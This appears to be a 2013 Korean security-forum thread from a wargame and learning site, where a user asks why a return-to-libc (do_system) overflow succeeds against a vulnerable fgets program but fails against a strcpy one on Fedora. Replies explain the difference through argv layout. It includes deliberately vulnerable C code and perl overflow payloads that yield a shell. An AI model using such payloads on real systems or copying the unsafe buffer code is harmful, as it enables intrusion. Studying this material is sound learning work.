리눅스

3923,

1/197

kumi123

do_system 궁금한 것이 잇습니다.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4329 [복사]

[dark_eyes@Fedora_1stFloor ~]$ cat a.c
#include <stdio.h>

int main(int argc, char* argv[])
{
        char buf[256];
        fgets(buf, 300, stdin);

        printf("%s \n", buf);

        return 0;
}

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x84\x07\x75\x00"';cat)| ./a

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA꼞

id
uid=502(dark_eyes) gid=502(dark_eyes) groups=502(dark_eyes) context=user_u:system_r:unconfined_t

do_system rtl 성공 ( + gets 도 )

하지만,

[dark_eyes@Fedora_1stFloor ~]$ cat b.c
#include <stdio.h>
#include "dumpcode.h"
int main(int argc, char* argv[])
{
        char buf[256];

        strcpy(buf, argv[1]);

        printf("%s \n", buf);

        dumpcode(buf, 300);
        return 0;
}

strcpy의 경우

./b `perl -e 'print "A"x268, "\x84\x07\x75\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA꼞
./b: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA꼞: File name too long

gets, fgets --> do_system rtl 성공

strcpy, strncpy --> 실패

이유가 뭘까요??

Hit : 2927 Date : 2013/08/22 04:00


chlxogns92	제 환경에선 둘다 exploit이 안되네요.. 근데, 원래 do_system의 인자는 eax로 들어가는거니까, main함수를 return 0으로 종료하면 exploit이 안되야 정상아닌가요?	2013/08/23
blueh4g	적어주신 글에 답이 있는거같아요 ^^; filename too long	2013/08/23
kumi123	- chlxogns92 페도라3만 되더군요.. 레드햇9 ~ 페도라2 (x) 페도라4 (x) 현재까지는 이렇습니다.	2013/08/26
kumi123	- blueh4g strpcy의 경우에는, main에 ebp ret argc argv 구조에서 do_system이 argv를 참조 하는거군요.. gets() 계열은, 임시버퍼에 파일을 저장했다가 복사를 하니, argv 자리에, 파일명이 짧아지는 군요. 알고나면 이렇게 간단한 이유데 ㅠㅠ, 감사합니다. ^^ 좋은거 또 배우고 가네요..	2013/08/26

3923

리눅스가 설치된 파일을 기존 내장ssd에서 외장ssd로 옮기기

wnddkdch2004

01/16

1447

3922

VM 환경에서 GPU 사용법에 대한 질문[1]

wuzu22

07/19

1450

3921

리눅스 공부 방법, 교재 추천해 주세요.[1]

Haike0548

05/24

1654

3920

vmware 칼리리눅스 질문있어요![2]

EgoistYI

04/05

1745

3919

ftz trainer1 암호요ㅠ[1]

keeyeon

04/02

1587

3918

FTZ접속방법[2]

tkd115

01/13

2316

3917

리눅스 john the ripper대한 질문 좀 할게요

cd1641

11/20

1590

3916

ftz 환경구축 하려고 하는데 계속 오류가 발생합니다. [2]

poh1207

07/10

1605

3915

[re] ftz 환경구축 하려고 하는데 계속 오류가 발생합니다.

kimwoojin0952

08/02

1379

3914

x11vnc 설치후, 윈도우 안됨. ubuntu18.04.2 LTS

localid

04/23

2125

3913

파일 디스크립터[1]

turttle2s

02/10

1585

3912

DVWA사용후 파이어폭스가안됩니다[1]

wlzh1313

02/07

2010

3911

리눅스 부팅USB 질문

iioks

12/29

1704

3910

dionaea honeypot 해보신분 계신가요?

teletubbies

07/05

2347

3909

리눅스에서 pupy설치할때..

redfrog

05/07

2941

3908

bootable USB 만들때

krimson701

03/27

2270

3907

FTZ 로컬환경 구축질문[1]

krimson701

03/19

2850

3906

하드 링크와 심볼릭 링크

ka0r1

12/07

2149

3905

리눅스 [1]

jeffrey4127

11/26

1881

3904

리눅스 vmware 설치[2]

jeffrey4127

10/31

2744

1 [2][3][4][5][6][7][8][9][10]..[197]